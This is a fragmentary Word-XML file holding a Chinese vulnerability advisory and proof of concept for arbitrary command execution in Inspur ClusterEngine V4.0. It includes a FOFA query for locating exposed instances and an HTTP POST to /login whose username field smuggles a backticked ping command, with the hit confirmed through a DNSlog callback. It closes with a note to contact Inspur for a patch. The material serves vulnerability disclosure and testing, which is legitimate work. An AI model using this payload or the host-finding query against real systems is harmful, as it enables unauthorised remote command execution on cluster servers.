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5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5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>浪潮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28"/>
          <w:szCs w:val="28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333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ClusterEngineV4.0 任意命令执行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浪潮 Inspur ClusterEngine是中国浪潮公司的一个应用软件。提供管理集群系统中软硬件提交的作业。 Inspur ClusterEngine V4.0 存在安全漏洞，远程攻击者可利用该漏洞可以向控制服务器发送恶意登录报文。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漏洞影响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ClusterEngineV4.0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FOFA: title="TSCEV4.0"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3080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26187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构造POC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/login HTTP/1.1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x.x.x.x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61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x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36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application/x-www-form-urlencoded; charset=UTF-8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Sec-Fetch-Site: same-origin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Sec-Fetch-Mode: cors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Sec-Fetch-Dest: empty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zh-CN,zh;q=0.9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Cookie: lang=cn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op=login&amp;username=admin`ping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>你获取的DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>`&amp;password=admin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4）DNSlog验证漏洞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150" cy="282257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82003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安全建议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请直接发送邮件至sec@inspur.com获取产品补丁包。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5FFBE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6125FFB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E62A5"/>
    <w:rsid w:val="42646292"/>
    <w:rsid w:val="46583D93"/>
    <w:rsid w:val="49D06C67"/>
    <w:rsid w:val="4C9B6B1E"/>
    <w:rsid w:val="4CA14BC6"/>
    <w:rsid w:val="52CF64C9"/>
    <w:rsid w:val="57C40712"/>
    <w:rsid w:val="738C0DA5"/>
    <w:rsid w:val="7AD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2021-04-07T09:41:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-07T10:05:16Z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